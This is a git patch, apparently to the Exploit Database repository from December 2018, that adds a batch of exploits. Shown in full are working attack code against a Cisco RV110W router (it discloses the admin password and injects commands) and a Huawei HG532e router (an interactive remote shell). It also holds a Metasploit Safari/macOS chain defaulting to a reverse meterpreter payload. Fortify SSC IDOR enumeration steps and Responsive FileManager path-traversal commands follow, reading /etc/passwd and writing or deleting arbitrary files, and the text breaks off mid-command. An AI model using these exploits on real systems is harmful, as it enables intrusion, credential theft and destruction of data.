From e3c06fe0f77432a0517abd1a5fcdad9bfc54c0d8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 15 Dec 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-12-15 16 changes to exploits/shellcodes Angry IP Scanner 3.5.3 - Denial of Service (PoC) UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH) Cisco RV110W - Password Disclosure / Command Execution Safari - Proxy Object Type Confusion (Metasploit) Adminer 4.3.1 - Server-Side Request Forgery Responsive FileManager 9.13.4 - Multiple Vulnerabilities Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2) Huawei Router HG532e - Command Execution Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password) Facebook And Google Reviews System For Businesses 1.1 - SQL Injection Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution Double Your Bitcoin Script Automatic - Authentication Bypass --- exploits/hardware/remote/45986.py | 98 ++++ exploits/hardware/webapps/45991.py | 51 ++ exploits/macos/remote/45998.rb | 510 +++++++++++++++++++ exploits/multiple/webapps/45989.txt | 185 +++++++ exploits/multiple/webapps/45990.txt | 185 +++++++ exploits/php/webapps/{43593.py => 43593.txt} | 0 exploits/php/webapps/45987.txt | 99 ++++ exploits/php/webapps/45992.html | 20 + exploits/php/webapps/45994.txt | 36 ++ exploits/php/webapps/45995.txt | 84 +++ exploits/php/webapps/45997.txt | 11 + exploits/windows/dos/45993.py | 21 + exploits/windows/dos/45996.py | 27 + exploits/windows/local/45988.py | 89 ++++ files_exploits.csv | 15 +- 15 files changed, 1430 insertions(+), 1 deletion(-) create mode 100755 exploits/hardware/remote/45986.py create mode 100755 exploits/hardware/webapps/45991.py create mode 100755 exploits/macos/remote/45998.rb create mode 100644 exploits/multiple/webapps/45989.txt create mode 100644 exploits/multiple/webapps/45990.txt rename exploits/php/webapps/{43593.py => 43593.txt} (100%) mode change 100755 => 100644 create mode 100644 exploits/php/webapps/45987.txt create mode 100644 exploits/php/webapps/45992.html create mode 100644 exploits/php/webapps/45994.txt create mode 100644 exploits/php/webapps/45995.txt create mode 100644 exploits/php/webapps/45997.txt create mode 100755 exploits/windows/dos/45993.py create mode 100755 exploits/windows/dos/45996.py create mode 100755 exploits/windows/local/45988.py diff --git a/exploits/hardware/remote/45986.py b/exploits/hardware/remote/45986.py new file mode 100755 index 000000000..6ac872869 --- /dev/null +++ b/exploits/hardware/remote/45986.py @@ -0,0 +1,98 @@ +#!/usr/bin/env python2 + +##### +## Cisco RV110W Password Disclosure and OS Command Execute. +### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.) + +# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute +# Date: 2018-08 +# Exploit Author: RySh +# Vendor Homepage: https://www.cisco.com/ +# Version: 1.1.0.9 +# Tested on: RV110W 1.1.0.9 +# CVE : CVE-2014-0683, CVE-2015-6396 + +import os +import sys +import re +import urllib +import urllib2 +import getopt +import json + +import ssl + +ssl._create_default_https_context = ssl._create_unverified_context + +### +# Usage: ./{script_name} 192.168.1.1 443 "reboot" +### + +if __name__ == "__main__": + IP = argv[1] + PORT = argv[2] + CMD = argv[3] + + # Get session key, Just access index page. + url = 'https://' + IP + ':' + PORT + '/' + req = urllib2.Request(url) + result = urllib2.urlopen(req) + res = result.read() + + # parse 'admin_pwd'! -- Get credits + admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1] + admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:] + print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd + + # Get session_id by POST + req2 = urllib2.Request(url + "login.cgi") + req2.add_header('Origin', url) + req2.add_header('Upgrade-Insecure-Requests', 1) + req2.add_header('Content-Type', 'application/x-www-form-urlencoded') + req2.add_header('User-Agent', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') + req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') + req2.add_header('Referer', url) + req2.add_header('Accept-Encoding', 'gzip, deflate') + req2.add_header('Accept-Language', 'en-US,en;q=0.9') + req2.add_header('Cookie', 'SessionID=') + data = {"submit_button": "login", + "submit_type": "", + "gui_action": "", + "wait_time": "0", + "change_action": "", + "enc": "1", + "user": admin_user, + "pwd": admin_pwd, + "sel_lang": "EN" + } + r = urllib2.urlopen(req2, urllib.urlencode(data)) + resp = r.read() + login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1] + session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1] + + # Execute your commands via diagnose command parameter, default command is `reboot` + req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id) + req3.add_header('Origin', url) + req3.add_header('Upgrade-Insecure-Requests', 1) + req3.add_header('Content-Type', 'application/x-www-form-urlencoded') + req3.add_header('User-Agent', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') + req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') + req3.add_header('Referer', url) + req3.add_header('Accept-Encoding', 'gzip, deflate') + req3.add_header('Accept-Language', 'en-US,en;q=0.9') + req3.add_header('Cookie', 'SessionID=') + data_cmd = {"submit_button": "Diagnostics", + "change_action": "gozila_cgi", + "submit_type": "start_ping", + "gui_action": "", + "traceroute_ip": "", + "commit": "1", + "ping_times": "3 |" + CMD + "|", + "ping_size": "64", + "wait_time": "4", + "ping_ip": "127.0.0.1", + "lookup_name": "" + } + r = urllib2.urlopen(req3, urllib.urlencode(data_cmd)) \ No newline at end of file diff --git a/exploits/hardware/webapps/45991.py b/exploits/hardware/webapps/45991.py new file mode 100755 index 000000000..18878c74d --- /dev/null +++ b/exploits/hardware/webapps/45991.py @@ -0,0 +1,51 @@ +#!/bin/python +''' + Author : Rebellion + Github : @rebe11ion + Twitter : @rebellion +''' + +import urllib2,requests,os,sys +from requests.auth import HTTPDigestAuth +DEFAULT_HEADERS = {"User-Agent": "Mozilla", } +DEFAULT_TIMEOUT = 5 +def fetch_url(url): + global DEFAULT_HEADERS, DEFAULT_TIMEOUT + request = urllib2.Request(url, headers=DEFAULT_HEADERS) + data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read() + return data + +def exploit(ip, path): + url = "http://%s:37215/icon/../../../%s" % (ip, path) + data = fetch_url(url) + return data + +def main(): + pwd = "/" + cmd_path = "/tmp/ccmd" + pwd_path = "/tmp/cpwd" + while True: + targetip = sys.argv[1] + cmd_ = raw_input("[{}]$ ".format(pwd)) + cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path) + rm = "\n \n \n $(" + cmd + ")\n$(echo HUAWEIUPNP)\n\n \n " + url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1" + requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm) + assert cmd_path.startswith("/"), "An absolute path is required" + data = exploit(targetip, cmd_path) + open(cmd_path,"wb").write(data) + if "cd" in cmd_: + pass + elif "clear" in cmd_: + os.system("clear") + elif "cat" in cmd_: + os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path)) + else: + if "|" in cmd_: + os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1])) + else: + os.system("cat {}".format(cmd_path)) + pwd = exploit(targetip,pwd_path).strip("\n") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/macos/remote/45998.rb b/exploits/macos/remote/45998.rb new file mode 100755 index 000000000..80f916705 --- /dev/null +++ b/exploits/macos/remote/45998.rb @@ -0,0 +1,510 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::EXE + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Safari Proxy Object Type Confusion', + 'Description' => %q{ + This module exploits a type confusion bug in the Javascript Proxy object in + WebKit. The DFG JIT does not take into account that, through the use of a Proxy, + it is possible to run arbitrary JS code during the execution of a CreateThis + operation. This makes it possible to change the structure of e.g. an argument + without causing a bailout, leading to a type confusion (CVE-2018-4233). + + The JIT region is then replaced with shellcode which loads the second stage. + The second stage exploits a logic error in libxpc, which uses command execution + via the launchd's "spawn_via_launchd" API (CVE-2018-4404). + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'saelo' ], + 'References' => [ + ['CVE', '2018-4233'], + ['CVE', '2018-4404'], + ['URL', 'https://github.com/saelo/cve-2018-4233'], + ['URL', 'https://github.com/saelo/pwn2own2018'], + ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'], + ], + 'Arch' => [ ARCH_PYTHON, ARCH_CMD ], + 'Platform' => 'osx', + 'DefaultTarget' => 0, + 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }, + 'Targets' => [ + [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ], + [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ], + ], + 'DisclosureDate' => 'Mar 15 2018')) + register_advanced_options([ + OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information in the exploit javascript", false]), + ]) + end + + def offset_table + { + '10.12.6' => { + :jsc_vtab => '0x0000d8d8', + :dyld_stub_loader => '0x00001168', + :dlopen => '0x000027f7', + :confstr => '0x00002c84', + :strlen => '0x00001b40', + :strlen_got => '0xdc0', + }, + '10.13' => { + :jsc_vtab => '0x0000e5f8', + :dyld_stub_loader => '0x000012a8', + :dlopen => '0x00002e60', + :confstr => '0x000024fc', + :strlen => '0x00001440', + :strlen_got => '0xee8', + }, + '10.13.3' => { + :jsc_vtab => '0xe5e8', + :dyld_stub_loader => '0x1278', + :dlopen => '0x2e30', + :confstr => '0x24dc', + :strlen => '0x1420', + :strlen_got => '0xee0', + }, + } + end + + def exploit_data(directory, file) + path = ::File.join Msf::Config.data_directory, 'exploits', directory, file + ::File.binread path + end + + def stage1_js + stage1 = exploit_data "CVE-2018-4233", "stage1.bin" + "var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);" + end + + def stage2_js + stage2 = exploit_data "CVE-2018-4404", "stage2.dylib" + payload_cmd = payload.raw + if target['Arch'] == ARCH_PYTHON + payload_cmd = "echo \"#{payload_cmd}\" | python" + end + placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER') + stage2[placeholder_index, payload_cmd.length] = payload_cmd + "var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);" + end + + def get_offsets(user_agent) + if user_agent =~ /Intel Mac OS X (.*?)\)/ + version = $1.gsub("_", ".") + mac_osx_version = Gem::Version.new(version) + if mac_osx_version >= Gem::Version.new('10.13.4') + print_warning "macOS version #{mac_osx_version} is not vulnerable" + elsif mac_osx_version < Gem::Version.new('10.12') + print_warning "macOS version #{mac_osx_version} is not vulnerable" + elsif offset_table.key?(version) + offset = offset_table[version] + return <<-EOF +const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]}; +const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]}; +const DLOPEN_OFFSET = #{offset[:dlopen]}; +const CONFSTR_OFFSET = #{offset[:confstr]}; +const STRLEN_OFFSET = #{offset[:strlen]}; +const STRLEN_GOT_OFFSET = #{offset[:strlen_got]}; +EOF + else + print_warning "No offsets for version #{mac_osx_version}" + end + else + print_warning "Unexpected User-Agent" + end + return false + end + + def on_request_uri(cli, request) + user_agent = request['User-Agent'] + print_status("Request from #{user_agent}") + offsets = get_offsets(user_agent) + unless offsets + send_not_found(cli) + return + end + + utils = exploit_data "CVE-2018-4233", "utils.js" + int64 = exploit_data "CVE-2018-4233", "int64.js" + html = %Q^ + + + + + + ^ + unless datastore['DEBUG_EXPLOIT'] + html.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') + end + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + +end \ No newline at end of file diff --git a/exploits/multiple/webapps/45989.txt b/exploits/multiple/webapps/45989.txt new file mode 100644 index 000000000..522d643e2 --- /dev/null +++ b/exploits/multiple/webapps/45989.txt @@ -0,0 +1,185 @@ +Details +================ +Software: Fortify SSC (Software Security Center) +Version: 17.10, 17.20 & 18.10 +Homepage: https://www.microfocus.com +Advisory report: https://github.com/alt3kx/CVE-2018-7690 +CVE: CVE-2018-7690 +CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) +CWE-639 + +Description +================ +Fortify SSC (Software Security Center) REST-API contain Insecure direct object references (IDOR) allowing reading arbitrary details of other user's +Fortify projects via GET method + +Vulnerability +================ +Fortify SSC (Software Security Center) 7.10, does not properly check ownership of projects, which allows remote authenticated (view-only) users +to read arbitrary details via API projects ID parameter to /api/v1/projects/{NUMBER} + +Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process. + +Proof of concept +================ + +Pre-requisites: + +- curl command deployed (Windows or Linux) +- jq command deployed (for parsing JSON fields), (Windows or Linux) +- Burpsuite Free/Pro deployed or any other Proxy to catch/send the request (optional) + +Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted), + +The URL normally is avaiable as following: + +Target: https://fortifyserver.com/ssc/#/ + +Step (2): Once logged extract the Cookie field, the formmat normallly as following: "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;" +Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default + +Step (4): The offending GET is: + +GET /ssc/api/v1/projects/2 HTTP/1.1 +Host: fortifyserver.com +Connection: close +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF; + +Step (5): Test the first GET (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following: + +# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/2 + +-H "Host: fortifyserver.com" +-H "Connection: close" +-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" +-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" +-H "Accept-Encoding: gzip, deflate" +-H "Accept-Language: en-US,en;q=0.9" +-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;" +-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF" +--proxy http://127.0.0.1:8080 | jq '.data' + +You should see the following response project details: + +{ + "createdBy": "admin", + "name": "Project Name Here", + "description": "", + "id": 2, + "creationDate": "2012-08-03T09:43:36.000+0000", + "issueTemplateId": null +} + +Step (6): Now extract all the projects details registered into Fortify SSC server: + +Payload: https://fortifyserver.com/ssc/api/v1/projects/{NUMBER} , and change the number as following: + +# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/5 + +-H "Host: fortifyserver.com" +-H "Connection: close" +-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" +-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" +-H "Accept-Encoding: gzip, deflate" +-H "Accept-Language: en-US,en;q=0.9" +-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;" +-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF" +--proxy http://127.0.0.1:8080 | jq '.data' + +You should see other project details available as following: + +{ +"createdBy": "alex", +"name": "Project Name Here", +"description": "", +"id": 5, +"creationDate": "2012-09-21T09:35:16.000+0000", +"issueTemplateId": null +} + +Step (7): Automate with BurpSuite Pro/Free choose: + +Payload Positions: "Intruder Tab -> Positions" highlight as following: + +-> /ssc/api/v1/projects/§1§ + +Payloads set: "Intruder Tab -> Payloads" with the following data: + +-> Payload set: 1 + +-> Payload type: Numbers + +Payload Options [Numbers]: + +-> Type: Sequential + +-> From: 0 + +-> To: 1500 + +-> Step: 1 + +Then start attack... + +Have fun! + +Mitigations +================ +Install the latest patches availabe here: +https://softwaresupport.softwaregrp.com/doc/KM03298201 + +Disclosure policy +================ +We believes in responsible disclosure. +Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report. + +This vulnerability will be published if we do not receive a response to this report with 10 days. + +Timeline +================ + +2018-05-24: Discovered +2018-05-25: Retest PRO environment +2018-05-31: Vendor notification, two issues found +2018-05-31: Vendor feedback received +2018-06-01: Internal communication +2018-06-01: Vendor feedback, two issues are confirmed +2018-06-05: Vendor notification, new issue found +2018-06-06: Vendor feedback, evaluating High submission +2018-06-08: Vendor feedback, High issue is confirmed +2018-06-19: Researcher, reminder sent +2018-06-22: Vendor feedback, summary of CVEs handled as official way +2018-06-26: Vendor feedback, official Hotfix for High issue available to test +2018-06-29: Researcher feedback +2018-07-02: Researcher feedback +2018-07-04: Researcher feedback, Hotfix tested on QA environment +2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018 +2018-08-02: Reminder to vendor, feedback received OK! +2018-09-26: Reminder to vendor, feedback received OK! +2018-09-26: Fixes received from the vendor +2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem +2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem +2018-10-11: Feedback from the vendor, technical details provided to the researcher +2018-10-16: Fixes now tested on QA environment +2018-11-08: Reminder received from the vendor, feedback provided by researcher +2018-11-09: Re-rest fixes on QA environment +2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed +2018-11-21: Researcher feedback +2018-11-23: Fixes working well/confirmed by researcher +2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers. +2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure +2018-11-26: Agreements with the vendor to publish the CVE/Advisory. +2018-12-12: Public report + +Discovered by: +Alex Hernandez aka alt3kx: +================ +Please visit https://github.com/alt3kx for more information. + +My current exploit list @exploit-db: +https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576 \ No newline at end of file diff --git a/exploits/multiple/webapps/45990.txt b/exploits/multiple/webapps/45990.txt new file mode 100644 index 000000000..d619a39d1 --- /dev/null +++ b/exploits/multiple/webapps/45990.txt @@ -0,0 +1,185 @@ +Details +================ +Software: Fortify SSC (Software Security Center) +Version: 17.10, 17.20 & 18.10 +Homepage: https://www.microfocus.com +Advisory report: https://github.com/alt3kx/CVE-2018-7691 +CVE: CVE-2018-7691 +CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) +CWE-639 + +Description +================ +REST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method + +Vulnerability +================ +Fortify SSC (Software Security Center) 17.10, does not properly check ownership of "authEntities", which allows remote authenticated (view-only) users +to read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities + +Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process. + +Proof of concept +================ + +Pre-requisites: + +- Curl command deployed (Windows or Linux) +- jq command deployed (for parsing JSON fields), (Windows or Linux) +- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional) + +Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted), + +The URL normally is avaiable as following: + +Target: https://fortifyserver.com/ssc/#/ + +Step (2): Once logged extract the Cookie field, the format normally as following: "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" +Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default + +Step (4): The offending POST is: + +POST /ssc/api/v1/bulk HTTP/1.1 +Host: fortifyserver.com +Connection: close +Accept: application/json, text/plain, */* +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 +Content-Type: application/json;charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414; +Content-Length: 123 + +{"requests":[{"uri":"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities","httpVerb":"GET"}]}\x0d\x0a + +Step (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following: + +# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk + +-H "Host: fortifyserver.com" +-H "Connection: close" +-H "Accept: application/json, text/plain, */*" +-H "X-Requested-With: XMLHttpRequest" +-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" +-H "Content-Type: application/json;charset=UTF-8" +-H "Accept-Encoding: gzip, deflate" +-H "Accept-Language: en-US,en;q=0.9" +-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" +-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" +--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a" +--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode' + +You should see the following response: + +200 + +Step (6): Now extract all local and LDAP users registered into Fortify SSC server: + +Payload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field "--data-binary" below and change the number as following: + +# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk + +-H "Host: fortifyserver.com" +-H "Connection: close" +-H "Accept: application/json, text/plain, */*" +-H "X-Requested-With: XMLHttpRequest" +-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" +-H "Content-Type: application/json;charset=UTF-8" +-H "Accept-Encoding: gzip, deflate" +-H "Accept-Language: en-US,en;q=0.9" +-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" +-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" +--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a" +--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName' + +You should see the following response with users available + +"admin" +"sca" +"alex" + +[../snip] + +Step (7): Automate with BurpSuite Pro/Free choose: + +Payload Positions: "Intruder Tab -> Positions" highlight as following: + +-> /api/v1/projectVersions/§1§/authEntities + +Payloads set: "Intruder Tab -> Payloads" with the following data: + +-> Payload set: 1 + +-> Payload type: Numbers + +Payload Options [Numbers]: + +-> Type: Sequential + +-> From: 0 + +-> To: 1500 + +-> Step: 1 + +Then start attack… +Have fun! + +Have fun! + +Mitigations +================ +Install the latest patches availabe here: +https://softwaresupport.softwaregrp.com/doc/KM03298201 + +Disclosure policy +================ +We believes in responsible disclosure. +Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report. + +This vulnerability will be published if we do not receive a response to this report with 10 days. + +Timeline +================ + +2018-05-24: Discovered +2018-05-25: Retest PRO environment +2018-05-31: Vendor notification, two issues found +2018-05-31: Vendor feedback received +2018-06-01: Internal communication +2018-06-01: Vendor feedback, two issues are confirmed +2018-06-05: Vendor notification, new issue found +2018-06-06: Vendor feedback, evaluating High submission +2018-06-08: Vendor feedback, High issue is confirmed +2018-06-19: Researcher, reminder sent +2018-06-22: Vendor feedback, summary of CVEs handled as official way +2018-06-26: Vendor feedback, official Hotfix for High issue available to test +2018-06-29: Researcher feedback +2018-07-02: Researcher feedback +2018-07-04: Researcher feedback, Hotfix tested on QA environment +2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018 +2018-08-02: Reminder to vendor, feedback received OK! +2018-09-26: Reminder to vendor, feedback received OK! +2018-09-26: Fixes received from the vendor +2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem +2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem +2018-10-11: Feedback from the vendor, technical details provided to the researcher +2018-10-16: Fixes now tested on QA environment +2018-11-08: Reminder received from the vendor, feedback provided by researcher +2018-11-09: Re-rest fixes on QA environment +2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed +2018-11-21: Researcher feedback +2018-11-23: Fixes working well/confirmed by researcher +2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers. +2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure +2018-11-26: Agreements with the vendor to publish the CVE/Advisory. +2018-12-12: Public report + +Discovered by: +Alex Hernandez aka alt3kx: +================ +Please visit https://github.com/alt3kx for more information. + +My current exploit list @exploit-db: +https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576 \ No newline at end of file diff --git a/exploits/php/webapps/43593.py b/exploits/php/webapps/43593.txt old mode 100755 new mode 100644 similarity index 100% rename from exploits/php/webapps/43593.py rename to exploits/php/webapps/43593.txt diff --git a/exploits/php/webapps/45987.txt b/exploits/php/webapps/45987.txt new file mode 100644 index 000000000..b79b82e16 --- /dev/null +++ b/exploits/php/webapps/45987.txt @@ -0,0 +1,99 @@ +Responsive FileManager 9.13.4 - Multiple Vulnerabilities + +Date: + December 12, 2018 + +Author: + farisv + +Vendor Homepage: + https://www.responsivefilemanager.com/ + +Vulnerable Package Link: + https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.4/responsive_filemanager.zip + + +Responsive FileManager is a free open-source file manager and image manager made with the jQuery library, CSS3, PHP and HTML5 that offers a nice and elegant way to upload and insert files, images and videos. +You can use it as external plugin for TinyMCE version 4.x (and older), CKEditor CLEditor, or you can also use it as a stand-alone file manager to manage and select files. + +The following are the vulnerabilities found before v 9.14.0. + +1. Arbitrary file read via path traversal with `path` parameter through `get_file` action in ajax_calls.php. + +$ curl -X POST -d "path=../../../../../../../etc/passwd" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=get_file&sub_action=edit&preview_mode=text" +% + +2. Arbitrary file read via path traversal with `path` parameter through `copy_cut` action in ajax_calls.php and `paste_clipboard` action in execute.php. + +# Copy/cut the file with directory traversal so the desired file path will be saved to the session. +$ curl -X POST -d "sub_action=copy&path=../../../../../../../etc/passwd" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=copy_cut" + +# Paste the clipboard +$ curl -X POST -d "path=" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=paste_clipboard" + +# File is in the `upload_dir` folder or in the dialog page. +$ curl http://localhost:1111/source/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin + +3. Arbitrary file write via path traversal mitigation bypass through `create_file` action in execute.php. + +# We can bypass the directory traversal mitigation by using an array. +$ curl -X POST -d "paths[0]=../../../../../../../../tmp/&names[0]=hacked.txt&new_content=Hacked" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=create_file" +$ ls /tmp +hacked.txt + +4. Arbitrary file deletion via path traversal mitigation bypass through `delete_file` action in execute.php. + +# We can bypass the directory traversal mitigation by using an array. +$ curl -X POST -d "paths[0]=../../../../../../../../tmp/hacked.txt" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=delete_file" + +5. Arbitrary directory deletion via path traversal mitigation bypass through `delete_folder` action in execute.php. + +# We can bypass the directory traversal mitigation by using an array. +$ curl -X POST -d "paths[0]=../filemanager" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=delete_folder" + +6. Arbitrary file write (only with jpg/jpeg/png extension) with `path` parameter through `save_img` action in ajax_calls.php. + +$ curl -X POST -d 